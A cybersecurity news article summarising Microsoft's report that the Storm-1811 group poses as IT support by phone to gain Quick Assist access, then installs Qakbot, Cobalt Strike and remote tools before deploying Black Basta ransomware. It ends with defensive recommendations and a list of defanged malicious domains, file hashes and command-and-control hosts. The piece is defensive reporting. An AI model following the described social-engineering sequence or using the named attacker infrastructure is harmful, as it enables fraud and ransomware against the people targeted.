Cyber Security

Hackers Exploiting Microsoft’s Quick Assist Tool To Deliver Ransomware

Hackers often target remote assist tools because they create a direct channel to access desired systems with minimum effort. 

These tools have been built for remote control and access purposes, which makes them very appealing targets for attackers looking to hack networks or take over specific devices.

Microsoft observed the Storm-1811 group using Quick Assist for social engineering attacks that deploy Black Basta ransomware. 

Exploiting Quick Assist’s Remote Access

The attacks begin with vishing, exploiting Quick Assist’s remote access for initial compromise, and then delivering malware like:-

  • Qakbot
  • Cobalt Strike

Microsoft is improving Quick Assist warnings against tech support scams while detections block malicious activity. Blocking unused remote tools and user education on recognizing scams can reduce risk.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Threat actors involved in threat activities impersonate IT support to undertake vishing attacks and trick target persons into giving them Quick Assist remote access. 

They usually do this by pretending to fix a problem or offering spam help as a response to email flooding.

Code screen (Source – Microsoft)

While on the call, Microsoft said they got the victim to initiate Quick Assist, enter the given code, enable screen sharing, and grant control access, consequently fully compromising the device.

Screen sharing (Source – Microsoft)

Control is taken over through Quick Assist during which scripts are run to download malicious payloads that sometimes pretend to be spam filter updates in order to harvest credentials.

Some of the observed payloads included Qakbot and remote management tools such as ScreenConnect and Cobalt Strike, which finally led to the deployment of Black Basta ransomware by the Storm-1811 group using their access from Qakbot and Cobalt Strike.

After initial access, the attackers use ScreenConnect for persistence and lateral movement, NetSupport Manager for remote control, and OpenSSH tunneling. 

They perform domain enumeration and use PsExec to deploy Black Basta ransomware received from the Qakbot and Cobalt Strike access by Storm-1811. 

Black Basta is closed ransomware distributed by a few actors. Relying on initial access brokers while focusing on pre-ransomware stages reduces the threat impact.

Recommendations

Here below we have mentioned all the recommendations:-

  • Block and uninstall unused remote tools like Quick Assist, and use secure alternatives like Remote Help.
  • Educate users on identifying tech support scams and not providing unauthorized remote access.
  • Report suspected malicious remote sessions and tech support scams.
  • Train users on protecting info, spotting phishing, and reporting recon attempts.
  • Implement anti-phishing solutions like Defender for Office 365.
  • Enable cloud-delivered protection and tamper protection in antivirus.
  • Turn on network protection against malicious domains.
  • Use automated investigation and remediation in Defender for Endpoint.
  • Follow Microsoft’s ransomware hardening guidance.

IoCs

Domain Names:

  • upd7a[.]com
  • upd7[.]com
  • upd9[.]com
  • upd5[.]pro

SHA-256:

  • 71d50b74f81d27feefbc2bc0f631b0ed7fcdf88b1abbd6d104e66638993786f8
  • 0f9156f91c387e7781603ed716dcdc3f5342ece96e155115708b1662b0f9b4d0
  • 1ad05a4a849d7ed09e2efb38f5424523651baf3326b5f95e05f6726f564ccc30
  • 93058bd5fe5f046e298e1d3655274ae4c08f07a8b6876e61629ae4a0b510a2f7
  • 1cb1864314262e71de1565e198193877ef83e98823a7da81eb3d59894b5a4cfb

ScreenConnect Relay:

  • instance-olqdnn-relay.screenconnect[.]com

NetSupport C2:

  • greekpool[.]com

Cobalt Strike Beacon C2:

  • zziveastnews[.]com
  • realsepnews[.]com

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free

Tushar Subhra Dutta

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Recent Posts

US Department Of Homeland Security Terminates Entire Advisory Committees

In a sweeping directive aimed at streamlining the Department of Homeland Security (DHS) operations, Acting…

4 hours ago

Hackers Exploited 16 0-days & Earned $382,750 – Pwn2Own Automotive 2025

The much-anticipated Pwn2Own Automotive 2025 kicked off today at Tokyo Big Sight, showcasing the cutting…

10 hours ago

Windows File Explorer Elevation Of Privilege Vulnerability(CVE-2024-38100) Exploited

A critical security flaw in Windows File Explorer, identified as CVE-2024-38100, has been actively exploited,…

11 hours ago

1,000+ Malicious Domains Mimic Reddit & WeTransfer To Deliver Malware

Over 1,000 malicious domains have been identified that impersonate popular platforms like Reddit and WeTransfer…

11 hours ago

Helldown Ransomware Exploiting Zyxel Devices Using Zero-Day Vulnerability

A new ransomware threat dubbed "Helldown" has emerged, actively exploiting vulnerabilities in Zyxel firewall devices…

11 hours ago

Ex-CIA Analyst Pleads Guilty To Leaking National Defense Information

A former CIA analyst, Asif William Rahman, 34, pleaded guilty today to unlawfully retaining and…

14 hours ago